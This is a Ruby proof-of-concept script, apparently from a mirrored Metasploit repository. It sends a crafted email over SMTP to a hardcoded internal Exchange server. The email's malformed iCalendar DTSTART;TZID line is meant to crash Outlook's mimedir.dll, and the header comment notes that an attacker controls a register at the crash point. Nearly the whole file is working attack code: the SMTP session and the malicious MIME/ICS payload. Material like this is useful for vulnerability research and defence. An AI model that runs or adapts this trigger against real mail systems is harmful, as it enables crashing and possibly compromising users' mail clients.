infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity
metasploit-framework/modules/exploits/private/killahbee_outlook.r_b

134 lines
3.8 KiB
Ruby
Executable File
Raw Blame History

#!/usr/bin/env ruby
#
# Important section:
#
# BEGIN:VEVENT
# DTSTAMP:20060509T194627Z
# DTSTART;TZID:20060509T150000
# END:VEVENT
#
# the DTSTART;TZID line requires the following form to be valid:
# DTSTART;TZID="timezone info goes here":<time>
#
# without the ="" it'll produce a read error in mimedir.dll @ 354dc00d
# mov eax, [eax + ecx + 0x8] <-- we control ecx
#
# Probably other possible crashes - still working.
#
# ~ Puss
#
$:.unshift('~/src/framework3/trunk/lib')
require 'rex'
s = Rex::Socket.create_tcp(
'PeerHost' => '10.4.10.190',
'PeerPort' => 25
)
puts s.get_once
s.write("EHLO X\r\n")
puts s.get_once
s.write("MAIL FROM: bar@EXCHNG.sfeng.sourcefire.com\r\n")
puts s.get_once
s.write("RCPT TO: foo@EXCHNG.sfeng.sourcefire.com\r\n")
puts s.get_once
s.write("DATA\r\n")
puts s.get_once
bsize = 32768
x =
%Q[ From: bar@EXCHNG.sfeng.sourcefire.com
To: foo@EXCHNG.sfeng.sourcefire.com
Subject: iCal Exploit
Content-class: urn:content-classes:calendarmessage
MIME-Version: 1.0
Content-Type: multipart/alternative;boundary="01BD3665.3AF0D360"
X-MimeOLE: Produced By Microsoft Exchange V6.5.7226.0
--01BD3665.3AF0D360
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: base64
VHlwZTpTaW5nbGUgTWVldGluZw0KT3JnYW5pemVyOkhEIE1vb3JlDQpTdGFydCBUaW1lOlR1ZXNk
YXksIE1heSAwOSwgMjAwNiAzOjAwIFBNDQpFbmQgVGltZTpUdWVzZGF5LCBNYXkgMDksIDIwMDYg
MzozMCBQTQ0KVGltZSBab25lOihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJiBDYW5hZGEp
DQpMb2NhdGlvbjpib2FyZCByb29tDQoNCip+Kn4qfip+Kn4qfip+Kn4qfioNCg0KDQpUaGlzIGlz
IGEgdGVzdA0KDQpNaWNyb3NvZnQgT3V0bG9vayBXZWIgQWNjZXNzOg0KaHR0cDovL01BSUwvRXhj
aGFuZ2UvaGRtb29yZS9JbmJveC90ZXN0LTIuRU1MP2NtZD1vcGVuDQoNCg==
--01BD3665.3AF0D360
Content-Type: text/html; charset="UTF-8"
Content-Transfer-Encoding: base64
PCFET0NUWVBFIEhUTUwgUFVCTElDICItLy9XM0MvL0RURCBIVE1MIDMuMi8vRU4iPg0KPEhUTUw+
DQo8SEVBRD4NCjxNRVRBIEhUVFAtRVFVSVY9IkNvbnRlbnQtVHlwZSIgQ09OVEVOVD0idGV4dC9o
dG1sOyBjaGFyc2V0PXV0Zi04Ij4NCjxNRVRBIE5BTUU9IkdlbmVyYXRvciIgQ09OVEVOVD0iTVMg
RXhjaGFuZ2UgU2VydmVyIHZlcnNpb24gNi41LjcyMjYuMCI+DQo8VElUTEU+dGVzdDwvVElUTEU+
DQo8L0hFQUQ+DQo8Qk9EWT4NCjwhLS0gQ29udmVydGVkIGZyb20gdGV4dC9wbGFpbiBmb3JtYXQg
LS0+DQoNCjxQPjxGT05UIFNJWkU9Mj5UeXBlOlNpbmdsZSBNZWV0aW5nPEJSPg0KT3JnYW5pemVy
OkhEIE1vb3JlPEJSPg0KU3RhcnQgVGltZTpUdWVzZGF5LCBNYXkgMDksIDIwMDYgMzowMCBQTTxC
Uj4NCkVuZCBUaW1lOlR1ZXNkYXksIE1heSAwOSwgMjAwNiAzOjMwIFBNPEJSPg0KVGltZSBab25l
OihHTVQtMDY6MDApIENlbnRyYWwgVGltZSAoVVMgJmFtcDsgQ2FuYWRhKTxCUj4NCkxvY2F0aW9u
OmJvYXJkIHJvb208QlI+DQo8QlI+DQoqfip+Kn4qfip+Kn4qfip+Kn4qPEJSPg0KPEJSPg0KPEJS
Pg0KVGhpcyBpcyBhIHRlc3Q8QlI+DQo8L0ZPTlQ+DQo8L1A+DQo8UD5NaWNyb3NvZnQgT3V0bG9v
ayBXZWIgQWNjZXNzOiA8QSBIUkVGPSJodHRwOi8vTUFJTC9FeGNoYW5nZS9oZG1vb3JlL0luYm94
L3Rlc3QtMi5FTUw/Y21kPW9wZW4iPmh0dHA6Ly9NQUlML0V4Y2hhbmdlL2hkbW9vcmUvSW5ib3gv
dGVzdC0yLkVNTD9jbWQ9b3BlbjwvQT48L1A+DQo8L0JPRFk+DQo8L0hUTUw+
--01BD3665.3AF0D360
Content-class: urn:content-classes:calendarmessage
Content-Type: text/calendar; method=REQUEST; name="meeting.ics"
Content-Transfer-Encoding: 8bit
BEGIN:VCALENDAR
METHOD:REQUEST
PRODID:Microsoft CDO for Microsoft Exchange
VERSION:2.0
BEGIN:VTIMEZONE
TZID:(GMT-06.00) Central Time (US & Canada)
X-MICROSOFT-CDO-TZID:11
BEGIN:STANDARD
DTSTART:16010101T020000
TZOFFSETFROM:-0500
TZOFFSETTO:-0600
RRULE:FREQ=YEARLY;WKST=MO;INTERVAL=1;BYMONTH=10;BYDAY=-1SU
END:STANDARD
BEGIN:DAYLIGHT
DTSTART:16010101T020000
TZOFFSETFROM:-0600
TZOFFSETTO:-0500
RRULE:FREQ=YEARLY;WKST=MO;INTERVAL=1;BYMONTH=4;BYDAY=1SU
END:DAYLIGHT
END:VTIMEZONE
BEGIN:VEVENT
DTSTAMP:20060509T194627Z
DTSTART;TZID:20060509T150000
END:VEVENT
END:VCALENDAR
--01BD3665.3AF0D360
]
x.each_line do |line|
line.strip!
s.write(line + "\r\n")
end
s.write(".\r\n")
puts s.get_once
s.write("QUIT\r\n")
puts s.get_once
Reference in New Issue View Git Blame Copy Permalink